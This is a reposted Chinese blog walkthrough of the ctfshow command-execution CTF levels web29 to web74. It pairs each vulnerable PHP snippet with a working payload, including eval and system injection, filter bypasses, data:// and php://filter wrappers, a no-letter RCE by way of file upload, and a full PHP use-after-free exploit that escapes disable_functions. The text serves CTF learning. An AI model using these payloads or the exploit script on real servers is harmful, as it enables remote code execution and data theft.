人工智能uu

这个屌丝很懒，什么也没留下！

热门标签

ctfshow命令执行_ctfshow 命令执行

作者：人工智能uu | 2024-07-10 20:53:15

踩

ctfshow 命令执行

web29

 <?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        eval($c);
    } 
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9
10

对flag进行过滤，利用eval进行命令执行

?c=system("ls");
1

在这里插入图片描述

?c=system("cat fl*");
1

查看页面源代码得到flag

web30

<?php

error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
1
2
3
4
5
6
7
8
9
10
11
12

比上一关多了system与php的过滤，能替换system的函数有

system()
passthru()
exec()
shell_exec()
``
popen()
proc_open()
pcntl_exec()
1
2
3
4
5
6
7
8

可以和上一关一样，不过得再加一个函数来输出(system执行后会输出,exec只输出最后一行内容)

?c=echo exec("cat fl*");
1

web31

 <?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9
10
11

空格被过滤可以用

> < <> 重定向符
%09(需要php环境)
${IFS}
$IFS$9
{cat,flag.php} //用逗号实现了空格功能
%20
%09
1
2
3
4
5
6
7

cat被过滤可以用

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示，可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl：显示的时候，顺便输出行号
od:以二进制的方式读取档案内容
vi:一种编辑器，这个也可以查看
vim:一种编辑器，这个也可以查看
sort:可以查看
uniq:可以查看
file -f:报错出具体内容
1
2
3
4
5
6
7
8
9
10
11
12

这里仍是上一关的思路，exec只能显示一行，所以使用passthru

?c=passthru("tac%09fl*");
1

web32

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
1
2
3
4
5
6
7
8
9
10
11

把 ( 和 ; 去掉了，( 的话我们可以使用文件包含的方法，不去使用它，; 的话可以用php中 ?> 前最后一句代码不需要加 ; 来绕过，所以最后的语句就是

?c=include%0a$_GET[1]?>&&1=php://filter/convert.base64-encode/resource=flag.php
1

最后再进行base64解密得到flag

web33

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
1
2
3
4
5
6
7
8
9
10
11

多过滤了单引号，但是好像作用不是很大，和上一关语句一样即可

?c=include%0a$_GET[1]?>&&1=php://filter/convert.base64-encode/resource=flag.php
1

web34

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
1
2
3
4
5
6
7
8
9
10
11

emmmm知识多了一个 : 好像用处并不是很大，上一关payload

?c=include%0a$_GET[1]?>&&1=php://filter/convert.base64-encode/resource=flag.php
1

web35

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
1
2
3
4
5
6
7
8
9
10
11

多过滤了一个 < ，payload继续同上

?c=include%0a$_GET[1]?>&&1=php://filter/convert.base64-encode/resource=flag.php
1

web36

<?php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|system|php|cat|sort|shell|\.| |\'|\`|echo|\;|\(|\:|\"|\<|\=|\/|[0-9]/i", $c)){
        eval($c);
    }
    
}else{
    highlight_file(__FILE__);
}
1
2
3
4
5
6
7
8
9
10
11

多了数字的过滤，那把get里换成字母就是了

?c=include$_GET[a]?>&&a=php://filter/convert.base64-encode/resource=flag.php
1

其实include后加不加%0a无所谓的，这里也不会因为有个%0a中的0就被挡住，反而用其他符号代替空格绕不过去

web37

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14

这里直接变成include包含参数，这里要利用伪协议来得到flag

data://，可以让用户来控制输入流，当它与包含函数结合时，用户输入的data://流会被当作php文件执行
text/plain的意思是将文件设置为纯文本的形式，浏览器在获取到这种文件时并不会对其进行处理
data://text/plain, 就算是一种用法
1
2
3

?c=data://text/plain,<?php system("cat fla?.php");?>
?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhPy5waHAiKTs/Pg==
1
2

web38

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag|php|file/i", $c)){
        include($c);
        echo $flag;
    
    }
        
}else{
    highlight_file(__FILE__);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14

比上关多了一个php的过滤，使用base64绕过就是了

?c=data://text/plain;base64,PD9waHAgc3lzdGVtKCJ0YWMgZmxhPy5waHAiKTs/Pg==
1

web39

<?php
//flag in flag.php
error_reporting(0);
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/flag/i", $c)){
        include($c.".php");
    }
        
}else{
    highlight_file(__FILE__);
}
1
2
3
4
5
6
7
8
9
10
11
12

emmmm好像是没什么用，直接同37

?c=data://text/plain,<?php system("tac fla?.php");?>
1

web40

<?php
if(isset($_GET['c'])){
    $c = $_GET['c'];
    if(!preg_match("/[0-9]|\~|\`|\@|\#|\\$|\%|\^|\&|\*|\（|\）|\-|\=|\+|\{|\[|\]|\}|\:|\'|\"|\,|\<|\.|\>|\/|\?|\\\\/i", $c)){
        eval($c);
    }
        
}else{
    highlight_file(__FILE__);
}
1
2
3
4
5
6
7
8
9
10

符号基本全被禁用了，但括号还活着，这不就是无参数的RCE吗？无参数RCE实例
首先先查看当前目录，然后可以通过逆转函数array_flip()、array_reverse逆转数组使得出现文件名，再然后可以通过随机函数array_rand随机出函数名字或者是next()函数搞出函数名，最后highlight_flie、show_source读取,但是这些不能混着使用，所以两种payload。

?c=highlight_file(array_rand(array_flip(scandir(pos(localeconv())))));
?c=show_source(next(array_reverse(scandir(pos(localeconv()))))); 
1
2

web41

https://blog.csdn.net/miuzzx/article/details/108569080

web42

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7

直接把写到黑洞里，就是执行了也不回显的意思，具体解释，这里的绕过就是将命令分割

;	//分号
|	//只执行后面那条命令
||	//只执行前面那条命令
&	//两条命令都会执行
&&	//两条命令都会执行
1
2
3
4
5

?c=ls;ls
?c=tac flag.php;ls
1
2

web43

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9

过滤了cat和 ; ，使用tac与 || 就是了。|| 能保证前面的命令一定执行。

?c=ls||ls
?c=tac flag.php||ls
1
2

web44

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9

多过滤了一个flag，利用通配符

?c=tac fla*||ls
1

web45

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9

多过滤一个空格利用%09即可绕过

?c=tac%09fla*||ls
1

web46

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9

多过滤了$ * 数字，问号还在可以用fla?绕过flag，空格可以继续使用%09，这里编码后不属于数字了

web47

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9

函数禁了好几个，但是tac好像还在，与上关完全相同

?c=tac%09fla?.php||ls
1

web48

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9

阿这，tac还活着

?c=tac%09fla?.php||ls
1

web49

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9

emmmm，tac今日全场最佳

?c=tac%09fla?.php||ls
1

web50

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9

禁用了%，这里用<>和 \ 组合绕过，因为<>与?不能同时出现,会没有回显

?c=tac<>fl\ag.php||ls
1

web51

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9

tac被过滤，使用nl代替，语句和之前一样即可，最后要在源代码处查看flag

?c=nl<>fla\g.php||ls
1

web52

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9

与之前几关稍有不同，甚至过滤更少了？直接找flag

?c=nl${IFS}fla?.php||ls
1

查看源代码，$flag="flag_here";假的flag，直接找到根目录发现flag,再nl

?c=ls${IFS}/||ls
?c=nl${IFS}/fla?||ls
1
2

web53

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\*|more|wget|less|head|sort|tail|sed|cut|tac|awk|strings|od|curl|\`|\%|\x09|\x26|\>|\</i", $c)){
        echo($c);
        $d = system($c);
        echo "<br>".$d;
    }else{
        echo 'no';
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9
10
11
12
13

直接system()，甚至不需要连接命令了

?c=nl${IFS}fla\g.php
1

web54

 <?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|.*c.*a.*t.*|.*f.*l.*a.*g.*| |[0-9]|\*|.*m.*o.*r.*e.*|.*w.*g.*e.*t.*|.*l.*e.*s.*s.*|.*h.*e.*a.*d.*|.*s.*o.*r.*t.*|.*t.*a.*i.*l.*|.*s.*e.*d.*|.*c.*u.*t.*|.*t.*a.*c.*|.*a.*w.*k.*|.*s.*t.*r.*i.*n.*g.*s.*|.*o.*d.*|.*c.*u.*r.*l.*|.*n.*l.*|.*s.*c.*p.*|.*r.*m.*|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9

奇怪的过滤方法，但是这里没有禁用grep--在指定文件中查找并输出带有指定字符的一行内容，mv--重命名，这两个函数都可完成做题

grep${IFS}f${IFS}fla?.???

?c=mv${IFS}fla?.???${IFS}a.txt
访问a.txt
1
2
3
4

web55

<?php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9

禁掉所有字母，这里是一个无字母的RCE。先附上P神无字母数字RCE和bi站讲解
首先搞一个POST文件上传的包

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>POST文件上传</title>
</head>
<body>
<form action="http://xxx.ctf.show:8080/" method="post" enctype="multipart/form-data">
    <!--链接是当前打开的题目链接-->
    <label for="file">文件名：</label>
    <input type="file" name="file" id="file"><br>
    <input type="submit" name="submit" value="提交">
</form>
</body>
</html>
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

上传一个文件(php、txt)，内容得有

#!/bin/sh
RCE
1
2

因为shell程序必须以"#!/bin/sh"开始，#! /bin/sh 是指此脚本使用/bin/sh来解释执行，#!是特殊的表示符，其后面跟的是解释此脚本的shell的路径
在这里插入图片描述
在本地phpstudy搞得，上传后抓包，c的参数是执行上传的临时文件，而文件名我们利用?通配符来完成，而下面文本内容就是我们任意执行的命令

在这里插入图片描述最后直接tac flag.php

web56

 <?php
 // 你们在炫技吗？ 
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
        system($c);
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9
10

同上在这里插入图片描述

web57

<?php
// 还能炫的动吗？
//flag in 36.php
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
        system("cat ".$c.".php");
    }
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8
9
10
11

这个题只需要构造出36这个数字即可，这里有一个奇怪的数学运算

$(()) = 0
~$(()) = -0
$((~$(()))) = -1
那么36个相加再$((~$(())))取反，所以
36 = $((~$(($((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))+$((~$(())))))))
1
2
3
4
5

如果是自己一个一个加的话你会发现36个相加并得不到flag，而是需要37个，这个应该是因为

$((~-37)) = 36
1

web58-65

<?php
// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8

这里变成了禁用函数，像一些phpinfo、system都已经被禁用了,直接文件读取，发现可行

c=echo highlight_file('flag.php');
c=show_source('flag.php');
c=echo file_get_contents('flag.php');
1
2
3

web66

<?php
// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
} 
1
2
3
4
5
6
7
8

代码仍然一样，当我们使用

c=highlight_file('flag.php');
1

得到了一波嘲讽

$flag="秀秀得了,这次不在这里"; 
1

那就先找目录，再看flag

c=print_r(scandir("/"));
c=highlight_file('/flag.txt');
1
2

web67

emmmm直接得到flag了，回去看原来是print_r被禁止了，使用var_dump

c=var_dump(scandir("/"));
c=highlight_file('/flag.txt');
1
2

web68-70

show_source、highlight_file、file_get_contents都被禁了，这里换成文件包含：include、require

c=var_dump(scandir("/"));
c=include("/flag.txt");
1
2

web71

打开附件

<?php
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}
?>
你要上天吗？
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

$s = ob_get_contents();//得到缓冲区的数据。
ob_end_clean();//清除缓冲区的内容，并将缓冲区关闭，并且不会输出内容。
1
2

这里可以用exit();绕过，直接退出后边的程序

c=include("/flag.txt");exit();
1

web72

<?php
error_reporting(0);
ini_set('display_errors', 0);
// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

?>

你要上天吗？
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17

glob遍历目录(不知道为啥一直搞不出来，总是显示问号，可能是exit();没有执行，最后burp上面搞出来)

c=?><?php
	$a=new DirectoryIterator("glob:///*txt");
foreach($a as $f)
{echo($f->__toString().' ');
}
exit(0);
?>
1
2
3
4
5
6
7

在这里插入图片描述
最后还要通过一个垃圾回收的绕过安全目录的漏洞脚本来完成最终cat到flag，需要对其进行url编码然后POST传参即可，我的免费hackbar直接放弃执行，burp也是一直卡着。

c=function ctfshow($cmd) {
    global $abc, $helper, $backtrace;

    class Vuln {
        public $a;
        public function __destruct() { 
            global $backtrace; 
            unset($this->a);
            $backtrace = (new Exception)->getTrace();
            if(!isset($backtrace[1]['args'])) {
                $backtrace = debug_backtrace();
            }
        }
    }

    class Helper {
        public $a, $b, $c, $d;
    }

    function str2ptr(&$str, $p = 0, $s = 8) {
        $address = 0;
        for($j = $s-1; $j >= 0; $j--) {
            $address <<= 8;
            $address |= ord($str[$p+$j]);
        }
        return $address;
    }

    function ptr2str($ptr, $m = 8) {
        $out = "";
        for ($i=0; $i < $m; $i++) {
            $out .= sprintf("%c",($ptr & 0xff));
            $ptr >>= 8;
        }
        return $out;
    }

    function write(&$str, $p, $v, $n = 8) {
        $i = 0;
        for($i = 0; $i < $n; $i++) {
            $str[$p + $i] = sprintf("%c",($v & 0xff));
            $v >>= 8;
        }
    }

    function leak($addr, $p = 0, $s = 8) {
        global $abc, $helper;
        write($abc, 0x68, $addr + $p - 0x10);
        $leak = strlen($helper->a);
        if($s != 8) { $leak %= 2 << ($s * 8) - 1; }
        return $leak;
    }

    function parse_elf($base) {
        $e_type = leak($base, 0x10, 2);

        $e_phoff = leak($base, 0x20);
        $e_phentsize = leak($base, 0x36, 2);
        $e_phnum = leak($base, 0x38, 2);

        for($i = 0; $i < $e_phnum; $i++) {
            $header = $base + $e_phoff + $i * $e_phentsize;
            $p_type  = leak($header, 0, 4);
            $p_flags = leak($header, 4, 4);
            $p_vaddr = leak($header, 0x10);
            $p_memsz = leak($header, 0x28);

            if($p_type == 1 && $p_flags == 6) { 

                $data_addr = $e_type == 2 ? $p_vaddr : $base + $p_vaddr;
                $data_size = $p_memsz;
            } else if($p_type == 1 && $p_flags == 5) { 
                $text_size = $p_memsz;
            }
        }

        if(!$data_addr || !$text_size || !$data_size)
            return false;

        return [$data_addr, $text_size, $data_size];
    }

    function get_basic_funcs($base, $elf) {
        list($data_addr, $text_size, $data_size) = $elf;
        for($i = 0; $i < $data_size / 8; $i++) {
            $leak = leak($data_addr, $i * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x746e6174736e6f63)
                    continue;
            } else continue;

            $leak = leak($data_addr, ($i + 4) * 8);
            if($leak - $base > 0 && $leak - $base < $data_addr - $base) {
                $deref = leak($leak);
                
                if($deref != 0x786568326e6962)
                    continue;
            } else continue;

            return $data_addr + $i * 8;
        }
    }

    function get_binary_base($binary_leak) {
        $base = 0;
        $start = $binary_leak & 0xfffffffffffff000;
        for($i = 0; $i < 0x1000; $i++) {
            $addr = $start - 0x1000 * $i;
            $leak = leak($addr, 0, 7);
            if($leak == 0x10102464c457f) {
                return $addr;
            }
        }
    }

    function get_system($basic_funcs) {
        $addr = $basic_funcs;
        do {
            $f_entry = leak($addr);
            $f_name = leak($f_entry, 0, 6);

            if($f_name == 0x6d6574737973) {
                return leak($addr + 8);
            }
            $addr += 0x20;
        } while($f_entry != 0);
        return false;
    }

    function trigger_uaf($arg) {

        $arg = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');
        $vuln = new Vuln();
        $vuln->a = $arg;
    }

    if(stristr(PHP_OS, 'WIN')) {
        die('This PoC is for *nix systems only.');
    }

    $n_alloc = 10; 
    $contiguous = [];
    for($i = 0; $i < $n_alloc; $i++)
        $contiguous[] = str_shuffle('AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');

    trigger_uaf('x');
    $abc = $backtrace[1]['args'][0];

    $helper = new Helper;
    $helper->b = function ($x) { };

    if(strlen($abc) == 79 || strlen($abc) == 0) {
        die("UAF failed");
    }

    $closure_handlers = str2ptr($abc, 0);
    $php_heap = str2ptr($abc, 0x58);
    $abc_addr = $php_heap - 0xc8;

    write($abc, 0x60, 2);
    write($abc, 0x70, 6);

    write($abc, 0x10, $abc_addr + 0x60);
    write($abc, 0x18, 0xa);

    $closure_obj = str2ptr($abc, 0x20);

    $binary_leak = leak($closure_handlers, 8);
    if(!($base = get_binary_base($binary_leak))) {
        die("Couldn't determine binary base address");
    }

    if(!($elf = parse_elf($base))) {
        die("Couldn't parse ELF header");
    }

    if(!($basic_funcs = get_basic_funcs($base, $elf))) {
        die("Couldn't get basic_functions address");
    }

    if(!($zif_system = get_system($basic_funcs))) {
        die("Couldn't get zif_system address");
    }


    $fake_obj_offset = 0xd0;
    for($i = 0; $i < 0x110; $i += 8) {
        write($abc, $fake_obj_offset + $i, leak($closure_obj, $i));
    }

    write($abc, 0x20, $abc_addr + $fake_obj_offset);
    write($abc, 0xd0 + 0x38, 1, 4); 
    write($abc, 0xd0 + 0x68, $zif_system); 

    ($helper->b)($cmd);
    exit();
}

ctfshow("cat /flag0.txt");ob_end_flush();
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201

web73-74

依旧是利用glob找到文件名，而这两关只是名字不一样
在这里插入图片描述
不过这里能直接通过include获取flag

c=include("/flagc.txt");exit();
1

声明：本文内容由网友自发贡献，不代表【wpsshop博客】立场，版权归原作者所有，本站不承担相应法律责任。如您发现有侵权的内容，请联系我们。转载请注明出处：https://www.wpsshop.cn/w/人工智能uu/article/detail/807638